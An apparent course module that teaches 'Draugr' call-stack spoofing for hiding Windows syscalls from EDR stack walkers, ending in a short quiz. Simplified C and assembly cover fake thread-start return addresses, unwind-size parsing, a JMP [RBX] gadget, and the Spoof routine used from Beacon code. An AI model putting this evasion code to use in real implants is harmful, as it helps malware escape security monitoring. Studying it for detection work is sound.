Difficulty: Intermediate

Module 5: The Spoof Assembly Routine

Five phases orchestrate the entire stack spoof — from address resolution to cleanup and return.

Module Overview

Draugr's core logic is distributed across five distinct phases. Each phase has a single responsibility: resolve addresses, calculate frame sizes, find a code gadget, build the synthetic stack and execute, then clean up. Understanding these phases is the key to understanding how every piece of the system fits together. This module covers the orchestration layer — the next modules will dive deep into the frame construction (Module 6) and the return mechanism (Module 7).

The Five-Phase Execution Model

Every Draugr syscall passes through five phases in strict order. If any phase fails, the syscall cannot proceed safely. The macro DRAUGR_SYSCALL triggers this entire pipeline.

Five-Phase Pipeline

Phase 1
DraugrInit
Phase 2
CalcStackSize
Phase 3
FindGadget
Phase 4
Spoof() ASM
Phase 5
Fixup

Phase Summary

PhaseFunctionResponsibility
1DraugrInitResolve three key addresses: BaseThreadInitThunk+0x14, RtlUserThreadStart+0x21, and kernelbase.dll base
2DraugrCalculateStackSizeParse UNWIND_CODE arrays for both functions to determine exact frame sizes in bytes
3DraugrFindGadgetScan kernelbase.dll .text section for a JMP [RBX] gadget (bytes 0xFF 0x23)
4Spoof()Assembly routine: build three-layer synthetic stack, set up registers, execute syscall
5FixupDeallocate synthetic frames, restore non-volatile registers, return to original caller

Phase 1: DraugrInit — Address Resolution

Before any stack spoofing can happen, Draugr must resolve three specific addresses. These addresses form the foundation of the entire fake call stack.

The Three Target Addresses

TargetWhy This Specific Offset
kernel32!BaseThreadInitThunk + 0x14Points to a CALL instruction within the function. When the stack unwinder encounters this as a return address, it follows the unwind metadata for BaseThreadInitThunk and sees a legitimate call site.
ntdll!RtlUserThreadStart + 0x21Points to a CALL instruction within the function. This is the bottom of every normal Windows thread's call stack — the function that the OS calls to start a thread.
kernelbase.dll base addressNeeded for Phase 3 (gadget scanning). The JMP [RBX] gadget is found by scanning the .text section of this DLL.

Why These Offsets?

The offsets +0x14 and +0x21 are not arbitrary. They point to existing CALL instructions within each function. When an EDR's stack walker encounters these as return addresses, it performs a backward scan for a CALL instruction and finds a real one. If the return address pointed to the function entry instead, the stack walker would see no preceding CALL instruction and flag the frame as suspicious. The offsets ensure the fake return addresses appear to be genuine return sites from legitimate function calls.

C - DraugrInit (simplified)BOOL DraugrInit(PDRAUGR_CONFIG config) {
    // Resolve kernel32!BaseThreadInitThunk
    HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
    FARPROC pBaseThreadInit = GetProcAddress(hKernel32,
                                  "BaseThreadInitThunk");
    config->BaseThreadInitThunk_Addr = (ULONG_PTR)pBaseThreadInit + 0x14;

    // Resolve ntdll!RtlUserThreadStart
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    FARPROC pRtlUserThread = GetProcAddress(hNtdll,
                                  "RtlUserThreadStart");
    config->RtlUserThreadStart_Addr = (ULONG_PTR)pRtlUserThread + 0x21;

    // Resolve kernelbase.dll base for gadget scanning
    config->KernelBase_Addr = (ULONG_PTR)GetModuleHandleA(
                                  "kernelbase.dll");

    return TRUE;
}

Every Thread Looks the Same

On any Windows system, every user-mode thread starts with the same bottom two frames: RtlUserThreadStart calls BaseThreadInitThunk, which calls the thread's entry point. By fabricating these exact frames, Draugr's fake stack is indistinguishable from a real thread's call stack. An EDR performing stack analysis sees the standard Windows thread initialization chain.

Phase 2: Stack Size Calculation

Each synthetic frame must be exactly the right size. If the frame for BaseThreadInitThunk is even one byte off, the stack unwinder will misalign and produce garbage frames. Draugr calculates these sizes by parsing the same UNWIND_CODE metadata that Windows uses internally.

Step 1: Get RUNTIME_FUNCTION

DraugrWrapperStackSize calls RtlLookupFunctionEntry to retrieve the RUNTIME_FUNCTION structure for the target function. This structure points to the function's UNWIND_INFO, which contains the UNWIND_CODE array.

C - DraugrWrapperStackSizeDWORD DraugrWrapperStackSize(ULONG_PTR functionAddr) {
    ULONG_PTR imageBase = 0;

    // RtlLookupFunctionEntry retrieves the RUNTIME_FUNCTION
    // for any address within an x64 function
    PRUNTIME_FUNCTION pRuntimeFunc = RtlLookupFunctionEntry(
        functionAddr,
        &imageBase,
        NULL    // HistoryTable - not needed
    );

    if (!pRuntimeFunc) return 0;

    // Parse the UNWIND_INFO to calculate total frame size
    return DraugrCalculateStackSize(imageBase, pRuntimeFunc);
}

Step 2: Parse UNWIND_CODEs

DraugrCalculateStackSize iterates through the UNWIND_CODE array and accumulates the total bytes that the function's prologue allocates on the stack. Each opcode type contributes a different amount.

C - DraugrCalculateStackSize (core logic)DWORD DraugrCalculateStackSize(ULONG_PTR imageBase,
                                PRUNTIME_FUNCTION pFunc)
{
    DWORD totalSize = 0;

    // Get UNWIND_INFO from RUNTIME_FUNCTION
    PUNWIND_INFO pUnwindInfo = (PUNWIND_INFO)(
        imageBase + pFunc->UnwindInfoAddress
    );

    DWORD i = 0;
    while (i < pUnwindInfo->CountOfCodes) {
        UNWIND_CODE code = pUnwindInfo->UnwindCode[i];

        switch (code.UnwindOp) {
            case UWOP_PUSH_NONVOL:     // push reg
                totalSize += 8;        // Each push = 8 bytes on x64
                i += 1;
                break;

            case UWOP_ALLOC_SMALL:     // sub rsp, N (small)
                totalSize += (code.OpInfo * 8) + 8;
                i += 1;
                break;

            case UWOP_ALLOC_LARGE:     // sub rsp, N (large)
                if (code.OpInfo == 0) {
                    // Next slot contains size / 8
                    totalSize += pUnwindInfo->UnwindCode[i+1].FrameOffset * 8;
                    i += 2;
                } else {
                    // Next TWO slots contain raw 32-bit size
                    DWORD rawSize = *(DWORD*)&pUnwindInfo->UnwindCode[i+1];
                    totalSize += rawSize;
                    i += 3;
                }
                break;

            default:
                i += 1;  // Skip unrecognized opcodes
                break;
        }
    }

    // Handle chained unwind info (UNW_FLAG_CHAININFO)
    if (pUnwindInfo->Flags & UNW_FLAG_CHAININFO) {
        // Chained RUNTIME_FUNCTION follows the UNWIND_CODE array
        PRUNTIME_FUNCTION pChained = /* next aligned RUNTIME_FUNCTION */;
        totalSize += DraugrCalculateStackSize(imageBase, pChained);
    }

    // Add 8 bytes for the return address pushed by CALL
    totalSize += 8;

    return totalSize;
}

UNWIND_CODE Opcode Reference

OpcodeMeaningStack Contribution
UWOP_PUSH_NONVOLpush reg (e.g., push rbp)+8 bytes
UWOP_ALLOC_SMALLsub rsp, N where N ≤ 128+(OpInfo * 8) + 8 bytes
UWOP_ALLOC_LARGEsub rsp, N where N > 128Reads 1 or 2 extra UNWIND_CODE slots for the size
UWOP_SET_FPREGlea rbp, [rsp+N]0 bytes (sets frame pointer, no allocation)
UWOP_SAVE_NONVOLmov [rsp+N], reg0 bytes (saves register, no allocation)

Chained Unwind Info

Some functions have chained unwind info (the UNW_FLAG_CHAININFO flag). This means the function's unwind data is split across multiple RUNTIME_FUNCTION entries. Draugr handles this by recursively calling DraugrCalculateStackSize on the chained entry. If it didn't, the calculated frame size would be too small, and the stack unwinder would misalign when walking past the synthetic frame.

The PRM (Parameter) Structure

The PRM structure is the central data package passed between the C orchestration code and the Spoof assembly routine. It carries everything the assembly needs to build the synthetic stack, execute the syscall, and clean up afterward.

PRM Structure Layout

Offset 0x00Fixup address← [RBX] dereferences here
0x08OG_retaddroriginal return address
0x10–0x38Saved RDI, RSI, R12–R15non-volatile registers
0x40BaseThreadInitThunk frame sizefrom Phase 2
0x48RtlUserThreadStart frame sizefrom Phase 2
0x50BaseThreadInitThunk+0x14fake return address 1
0x58RtlUserThreadStart+0x21fake return address 2
0x60Gadget address (JMP [RBX])from Phase 3
0x68SSN (System Service Number)from VxTable
0x70Syscall instruction addressin ntdll stub
0x78+Function arguments (arg1–argN)passed to syscall

Why Fixup at Offset 0x00?

The first field of PRM is the Fixup address. This is not a coincidence — it is a critical design choice. After the syscall returns, the JMP [RBX] gadget executes. RBX points to the PRM structure. The instruction JMP [RBX] dereferences RBX and jumps to the value stored at [RBX + 0] — which is the Fixup address. By placing Fixup at offset zero, the gadget naturally redirects execution to the cleanup routine without any additional offset calculations.

Register Preservation

The x64 Windows calling convention designates certain registers as non-volatile (callee-saved). Any function that modifies these registers must restore them before returning. Since the Spoof routine manipulates the entire stack and register state, it must save and restore all non-volatile registers to maintain correctness.

Non-Volatile Register Save

At the very beginning of the Spoof routine, the following registers are saved into the PRM structure:

RegisterPRM OffsetWhy It Must Be Saved
RDI0x10Callee-saved; used internally by Spoof for memory operations
RSI0x18Callee-saved; may be used as a source pointer
R120x20Callee-saved; available as scratch within Spoof
R130x28Callee-saved; available as scratch within Spoof
R140x30Callee-saved; available as scratch within Spoof
R150x38Callee-saved; available as scratch within Spoof
ASM - Spoof() entry (from Stub.s)Spoof:
    ; RCX = pointer to PRM structure
    mov  rbx, rcx              ; RBX = &PRM (persists across syscall)

    ; Save the original return address
    mov  rax, [rsp]            ; RAX = return address on stack
    mov  [rbx + 0x08], rax     ; PRM.OG_retaddr = return address

    ; Save all non-volatile registers into PRM
    mov  [rbx + 0x10], rdi     ; PRM.saved_rdi
    mov  [rbx + 0x18], rsi     ; PRM.saved_rsi
    mov  [rbx + 0x20], r12     ; PRM.saved_r12
    mov  [rbx + 0x28], r13     ; PRM.saved_r13
    mov  [rbx + 0x30], r14     ; PRM.saved_r14
    mov  [rbx + 0x38], r15     ; PRM.saved_r15

    ; ... Phase 4 continues: build synthetic stack ...

Why RBX Is the Anchor

RBX is a non-volatile register in the x64 calling convention. This means the syscall instruction (which transitions to kernel mode and back) is required to preserve RBX. After the syscall returns, RBX still points to the PRM structure. This is why the JMP [RBX] gadget works — it can always find the Fixup address through the preserved RBX pointer, no matter what the kernel did during execution.

What Happens If Registers Are Not Restored?

If the Fixup routine fails to restore the non-volatile registers, the calling function will use corrupted values. The C compiler assumes that callee-saved registers are unchanged after a function call. Corrupted RDI, RSI, or R12-R15 would cause silent data corruption, wrong loop counters, invalid pointer dereferences, or outright crashes in the Beacon code that called the Draugr syscall.

Putting It All Together

Here is the complete data flow from the DRAUGR_SYSCALL macro to the Spoof assembly entry point:

Data Flow: C to Assembly

DRAUGR_SYSCALL
macro expands
DraugrCall
fills PRM struct
Spoof(&PRM)
RCX = &PRM
Build Stack
3-layer synthetic
syscall
kernel transition

DraugrCall: The Packager

DraugrCall is the final C function before entering assembly. It populates every field of the PRM structure with data gathered from Phases 1–3, sets the SSN, the syscall instruction address, and copies all function arguments into the PRM. Then it calls Spoof(&PRM), passing the structure pointer in RCX (the first argument register on x64 Windows).

C - DraugrCall (simplified)NTSTATUS DraugrCall(PDRAUGR_CONFIG config, PVX_TABLE_ENTRY entry,
                     DWORD argc, ...)
{
    PRM prm = { 0 };

    // Phase 1 results
    prm.BaseThreadInitThunk_Addr = config->BaseThreadInitThunk_Addr;
    prm.RtlUserThreadStart_Addr  = config->RtlUserThreadStart_Addr;

    // Phase 2 results
    prm.BaseThreadInitThunk_Size = config->BaseThreadInitThunk_FrameSize;
    prm.RtlUserThreadStart_Size  = config->RtlUserThreadStart_FrameSize;

    // Phase 3 result
    prm.Gadget = config->GadgetAddr;

    // SSN and syscall address from VxTable
    prm.SSN          = entry->wSSN;
    prm.SyscallAddr  = entry->pSyscallAddr;

    // Fixup routine address
    prm.Fixup = (ULONG_PTR)&Fixup;

    // Copy function arguments into PRM
    va_list args;
    va_start(args, argc);
    for (DWORD i = 0; i < argc; i++) {
        prm.args[i] = va_arg(args, ULONG_PTR);
    }
    va_end(args);

    // Enter the assembly routine
    return Spoof(&prm);
}

Module 5 Quiz: The Spoof Assembly Routine

Q1: Why are the offsets +0x14 and +0x21 chosen for BaseThreadInitThunk and RtlUserThreadStart respectively?

Correct! The offsets point to real CALL instructions inside each function. When a stack walker performs a backward scan from a return address looking for a preceding CALL, it finds a genuine one. If the offsets pointed to the function entry or a non-CALL instruction, the return addresses would be flagged as invalid.

Q2: Why is the Fixup address stored at offset 0x00 in the PRM structure?

The JMP [RBX] gadget reads the value at the address stored in RBX and jumps there. Since RBX points to the start of the PRM structure, it reads offset 0x00. Placing the Fixup address at offset zero means the gadget naturally redirects to cleanup without needing any offset arithmetic.